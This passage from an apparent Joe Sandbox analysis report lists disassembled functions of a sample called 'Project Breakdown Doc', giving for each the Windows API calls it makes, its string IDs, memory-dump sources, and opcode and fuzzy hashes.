                                                  • Opcode ID: 6874e026da17b1d9297a0d41695f62ad18eafde62a749f8278b9332f45ebc706
                                                  • Instruction ID: 67b3adbec5890a7d35874ac196945c3d450b310e9a1f8b3d87c4ca8a6466d886
                                                  • Opcode Fuzzy Hash: 6874e026da17b1d9297a0d41695f62ad18eafde62a749f8278b9332f45ebc706
                                                  • Instruction Fuzzy Hash: D9415FB1600208EFDF15CF55C888B9A7BA9EF44350F1580AEED06AF205D7B1DE84DBA0
                                                  Function 00CA2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2CAF
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CA2CCB
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00CA2D11
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D06890,00000000), ref: 00CA2D5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 6c409dbbc8644dbb0052eb8c7e8572d71294534ec04fe503618fcedfe3c4d4d3
                                                  • Instruction ID: ff5b3f41d91d47aa67506ee1c9934f432686a1b25e728b163cdaed8f6baa6b78
                                                  • Opcode Fuzzy Hash: 6c409dbbc8644dbb0052eb8c7e8572d71294534ec04fe503618fcedfe3c4d4d3
                                                  • Instruction Fuzzy Hash: DE41B1306043129FD720DF28C884B1ABBE8FF86328F14465EF966972D2D770E905CB92
                                                  Function 00CBDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CBDAD9
                                                    • Part of subcall function 00C479AB: _memmove.LIBCMT ref: 00C479F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: 806ff24814c180168dd3bc695b7f1f2d18e641cd749bad2b0e39ff2e1d3fbd2d
                                                  • Instruction ID: d06d13c1d09e08d1b5a2163ffe83f9113f3919477842e42a9076f8becd427d8a
                                                  • Opcode Fuzzy Hash: 806ff24814c180168dd3bc695b7f1f2d18e641cd749bad2b0e39ff2e1d3fbd2d
                                                  • Instruction Fuzzy Hash: BA318D7150461AAFCF10EF94C8819FEB3B4FF15310F108A69E976A76D1DB31AA06DB80
                                                  Function 00C99372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C993F6
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C99409
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C99439
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: 30dfa0ce46de52ff2f49884717e02a750276e76668c89a529e3037f311698822
                                                  • Instruction ID: 85da8f9256495b66e1718c4eeda6f797b168d1257b0bfe0f60b2523a16409a13
                                                  • Opcode Fuzzy Hash: 30dfa0ce46de52ff2f49884717e02a750276e76668c89a529e3037f311698822
                                                  • Instruction Fuzzy Hash: 6621F371900108BBDF14ABB4DC89DFFB778EF05360B14422DF925972E1DB354E0AA620
                                                  Function 00CB1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB1B40
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB1B66
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CB1B96
                                                  • InternetCloseHandle.WININET(00000000), ref: 00CB1BDD
                                                    • Part of subcall function 00CB2777: GetLastError.KERNEL32(?,?,00CB1B0B,00000000,00000000,00000001), ref: 00CB278C
                                                    • Part of subcall function 00CB2777: SetEvent.KERNEL32(?,?,00CB1B0B,00000000,00000000,00000001), ref: 00CB27A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: ad2806be964103cf0735ee6280b76f4f6d15dd8c83cd87e08cfe062d282df9ca
                                                  • Instruction ID: f496d6edcdc0bd12e4fe13e18a98841a76f031f234ecd405b0d8c9b75cc50cdd
                                                  • Opcode Fuzzy Hash: ad2806be964103cf0735ee6280b76f4f6d15dd8c83cd87e08cfe062d282df9ca
                                                  • Instruction Fuzzy Hash: E4219DB1600208BFEB219F65DCD5FFF76EDEB49744F14412EF905E6240EA209E05A7A1
                                                  Function 00CC6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC66D0
                                                  • LoadLibraryW.KERNEL32(?), ref: 00CC66D7
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC66EC
                                                  • DestroyWindow.USER32(?), ref: 00CC66F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: aac9aec5aeb8da9bfb4d288d15b71714ae7e9ab16798ef3216e4a52ce5b53996
                                                  • Instruction ID: 068c8269df3e603ac6c1d8fe957c7a8349cb27401ccd3015df388b4d40c51c10
                                                  • Opcode Fuzzy Hash: aac9aec5aeb8da9bfb4d288d15b71714ae7e9ab16798ef3216e4a52ce5b53996
                                                  • Instruction Fuzzy Hash: F3219A7120020AABEF104F64ED80FBB77ADEF59368F10462DFA61921A0D771CD92A761
                                                  Function 00CA703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00CA705E
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA7091
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00CA70A3
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CA70DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 8830af2f3b80dd10824aae4ee9493cda816ebbe4febc90f2bf3f03ba8be207e7
                                                  • Instruction ID: 4762b5da1e09988f3a0282ddeebd42c21334414ce1beb1614f228d7cf737eb10
                                                  • Opcode Fuzzy Hash: 8830af2f3b80dd10824aae4ee9493cda816ebbe4febc90f2bf3f03ba8be207e7
                                                  • Instruction Fuzzy Hash: 8C214F7450420AABDB209F69DC05B9E7BA8BF46728F204729F9B1D72D0E77099518B50
                                                  Function 00CA710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00CA712B
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA715D
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00CA716E
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CA71A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: aa34c8c6ccfa05fb3dde2c78fcc220899f6b0c0c7a87d8e55034849e2a43f99e
                                                  • Instruction ID: 333bdab109545511d8be5538e19a6245fe33aff5d628ea5b08d9e98d007e8d2e
                                                  • Opcode Fuzzy Hash: aa34c8c6ccfa05fb3dde2c78fcc220899f6b0c0c7a87d8e55034849e2a43f99e
                                                  • Instruction Fuzzy Hash: A921A1756042079BDB209F69DC04BAEB7E8BF56728F200B19FEB5D32D0E77099418B60
                                                  Function 00CAAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAAEBF
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CAAF13
                                                  • __swprintf.LIBCMT ref: 00CAAF2C
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CCF910), ref: 00CAAF6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: b15ab65c51907a807d53c906fe7173591e57873cdc4c62b8bf12a4afe3d97141
                                                  • Instruction ID: cab86eb07898e4a734d355abf894f44755029407cdd7534174e0c317e3e3228b
                                                  • Opcode Fuzzy Hash: b15ab65c51907a807d53c906fe7173591e57873cdc4c62b8bf12a4afe3d97141
                                                  • Instruction Fuzzy Hash: 2C218331A00109AFCB10DF65CC85EEEBBB8FF89704B004069F909EB251DB71EA41DB21
                                                  Function 00C9A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C9A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9A399
                                                    • Part of subcall function 00C9A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9A3AC
                                                    • Part of subcall function 00C9A37C: GetCurrentThreadId.KERNEL32 ref: 00C9A3B3
                                                    • Part of subcall function 00C9A37C: AttachThreadInput.USER32(00000000), ref: 00C9A3BA
                                                  • GetFocus.USER32 ref: 00C9A554
                                                    • Part of subcall function 00C9A3C5: GetParent.USER32(?), ref: 00C9A3D3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9A59D
                                                  • EnumChildWindows.USER32(?,00C9A615), ref: 00C9A5C5
                                                  • __swprintf.LIBCMT ref: 00C9A5DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  • Opcode ID: 3e19306e7e9bdf8acc5494476ae09ed398c3829187240e5931e70a0b4845cb48
                                                  • Instruction ID: e8ecb245c57ab1493bb2020e45e9e356e58c96ca2dcdac4c831f1eb16f6bf688
                                                  • Opcode Fuzzy Hash: 3e19306e7e9bdf8acc5494476ae09ed398c3829187240e5931e70a0b4845cb48
                                                  • Instruction Fuzzy Hash: 4C117F75600209BBDF11BF75DC89FEE3779AF48700F044079F918AA192CA709A46ABB5
                                                  Function 00CA2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CA2048
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: cf7e06dc580017bf30222d5a05b3120ab75812995362e6846aa19afb4563c91e
                                                  • Instruction ID: 92591de475963579ba273cd46c471735d5da8e3589405af9a2d97a0dcf1e3504
                                                  • Opcode Fuzzy Hash: cf7e06dc580017bf30222d5a05b3120ab75812995362e6846aa19afb4563c91e
                                                  • Instruction Fuzzy Hash: 7611617090011EDFCF10EFE8D8815FEB7B4FF16304B108569D96567252DB325A06EB51
                                                  Function 00CBEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CBEF1B
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CBEF4B
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CBF07E
                                                  • CloseHandle.KERNEL32(?), ref: 00CBF0FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: 31171095274372882b62c5af0cfe46f9378f04db88f4df5d7c0e04a4f4443b9a
                                                  • Instruction ID: 82b7950beca02827fa8079f49bc19b8d74848fd5593a0a2a4deb49c0f9588f61
                                                  • Opcode Fuzzy Hash: 31171095274372882b62c5af0cfe46f9378f04db88f4df5d7c0e04a4f4443b9a
                                                  • Instruction Fuzzy Hash: C8815E716043119FD720EF28C886B6EB7E5EF88B10F14881DF999DB392DB70AD419B52
                                                  Function 00C6564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                  • Instruction ID: bdc2cd0b3d02c1c536f9f4d939109f6144595ec96f3f02e98e65cacb40f7c046
                                                  • Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                  • Instruction Fuzzy Hash: 2A517C70A10B0ADBDB348FA9C8C466EB7A5AF40320F748729F839962D0DB71DE51DB50
                                                  Function 00CC02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0388
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC03C7
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CC040E
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00CC043A
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0447
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: b00ebbb4d1638688a323fb9552a4137e75038e95ebf69d7c3d60e7f99b0cacf4
                                                  • Instruction ID: 6269acedc7f90214bbf8e0d651ecabb6d822ac6892bf7905c4c7cd948d87a473
                                                  • Opcode Fuzzy Hash: b00ebbb4d1638688a323fb9552a4137e75038e95ebf69d7c3d60e7f99b0cacf4
                                                  • Instruction Fuzzy Hash: 04513731208244EFD704EB64C885F6EB7E9FF84704F54892DF596872A2DB30E905EB52
                                                  Function 00CBDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CBDC3B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CBDCBE
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CBDCDA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CBDD1B
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CBDD35
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: 477bc8294c572b2c4e6e35d2c40a921e5a8e02cd0d1ffdb89606e5ff3735bb22
                                                  • Instruction ID: 258efbeef5525b8ad1bd373385353709a9a1f0c38df645e13a0887ede6d53b1b
                                                  • Opcode Fuzzy Hash: 477bc8294c572b2c4e6e35d2c40a921e5a8e02cd0d1ffdb89606e5ff3735bb22
                                                  • Instruction Fuzzy Hash: 8A511875A00615DFCB00EF68C484DAEBBF5FF58310B148069E85AAB362DB31AE45DF91
                                                  Function 00CAE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CAE88A
